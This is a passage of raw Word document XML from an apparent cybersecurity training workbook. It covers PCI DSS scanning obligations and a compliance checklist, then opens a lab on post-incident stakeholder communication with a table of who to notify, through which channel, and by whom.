      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[ ] Risk acceptances have an executive signoff and a review date.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>[ ] Distribution list is restricted; share via the auditor's secure portal, not email.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — Periodic regulatory scans (PCI DSS 11.3.2 — ASV)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>PCI DSS specifically requires:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Internal vulnerability scans: quarterly (Lab 12).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>External scans by an Approved Scanning Vendor (ASV): quarterly (you cannot self-attest these).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Re-scans after significant change: anytime.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Mark each scan on the calendar with a 7-day buffer for remediation before audit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Build a crosswalk that prevents duplicate control work across PCI/ISO/CSF/CIS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Index evidence per control with a unique ID and a hash.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Author a quarterly compliance report skeleton.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Recognise specific PCI DSS scanning obligations (internal vs ASV).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should be able to build a crosswalk that prevents duplicate control work across PCI/ISO/CSF/CIS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 30 — Stakeholder Communication and Lessons Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Goal: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will draft the four canonical post-incident communications — executive, customer, regulator, public/media — and close the incident with a structured lessons learned and root cause analysis that feeds the next preparation cycle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will draft the four canonical post-incident communications — executive, customer, regulator, public/media — and close the incident with a structured lessons learned and root cause analysis that feeds the next preparation cycle. This maps to CySA+ 4.2 (Communications — Legal, Public relations, Customer comms, Media, Regulatory reporting, Law enforcement; Root cause analysis; Lessons learned; Stakeholder identification).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>This lab is writing-heavy. Output: four templates plus a 5-Whys analysis.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Environment: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Killercoda Ubuntu Playground</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Identify every stakeholder for CASE-001</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Carry the CASE-001 scenario from Lab 27. Tabulate stakeholders by influence and interest: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01"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Stakeholder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Notify?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Channel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CEO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Decision authority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Yes (sev 1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Phone + email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CISO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CISO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>IR sponsor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>War room</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>IC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CFO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Finance scope owner</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CISO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Legal counsel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Privilege, hold, regulator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Yes (immediately)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Phone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>IC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Comms / PR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Public messaging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Yes (sev 1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>War room</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CISO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Affected customers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Subjects of breach</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Yes (within 72 h)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Templated email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Comms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Supervisory Authority (GDPR DPA)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Regulator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Yes (within 72 h)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Web form + letter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Legal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cyber-insurance carrier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Coverage trigger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Phone</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Legal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Law enforcement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Investigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Optional</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Phone referral</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Legal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Employees</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1901"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Confidence + awareness</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
